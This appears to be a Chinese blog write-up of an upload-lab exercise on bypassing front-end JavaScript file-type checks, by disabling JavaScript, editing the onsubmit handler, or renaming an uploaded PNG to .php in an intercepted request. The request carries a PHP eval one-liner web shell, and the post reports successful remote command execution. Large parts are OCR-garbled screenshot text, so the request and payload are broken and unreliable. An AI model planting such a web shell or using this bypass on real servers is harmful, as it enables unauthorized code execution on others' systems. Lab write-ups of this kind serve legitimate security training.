JZTXT

文件上传-js前端验证

发布时间 2023-06-25 19:23:41作者: 小吕不忧伤

先上传一个文件看看

Re uest Cookies Data tools AntSword-W Burpsuite _F BZ162 caidao-2016 cain4.9 downlondto FinalShe11Ai

 

 

这里有标识文件类型

 

方法一:

禁用js前端验证

使用工具禁用所有的 js 脚本

 

0 景 用 , 怎 CO 。 ” / CSS• 禁 甲 存 (D 禁 用 DNS 缓 存 〖 ) 用 Java 禁 用 Meta 里 定 同 景 用 最 小 字 体 大 小 ( E , 禁 用 页 面 色 彩 ( 禁 用 惮 出 到 囗 用 , ℃ 珏 ( D 禁 用 页 面 铐 向 旧 u 表 望 . 《 0 片 . @网页信息. 0 上 传 一 个 到 服 务 丷 禁 用 %ÄJavaScript(Q) 丿 禁 用 FE%JJavaScriptEÉ

 

或者修改 onsubmit 参数

 

 

 

 

i F footer (div c pt type=- text/ min. (script type—- text t javascript• i p t j nascrzpt• (script type—- text.' javascript• f 'S/ prisz—php. i p t type•• text/ 25px: • > src-%upload Src up L -labs—aaster

 

 

保证

 

return checkFile()

函数返回值为true

 

第二种方法:

 

上传png文件 改为php后缀

-23977239422916 Content—Disposition: form—data; file" , Content — Type : image/ png @eval ['cmd']); --23977239422916 Content—Dxspositxon: form—data; " --23977239422916--1 filename=" cmdyih - I. php"

<div "msg <div <img src=" . / upload/ cmdyih — I. php" width= Opx

远程执行命令,回显成功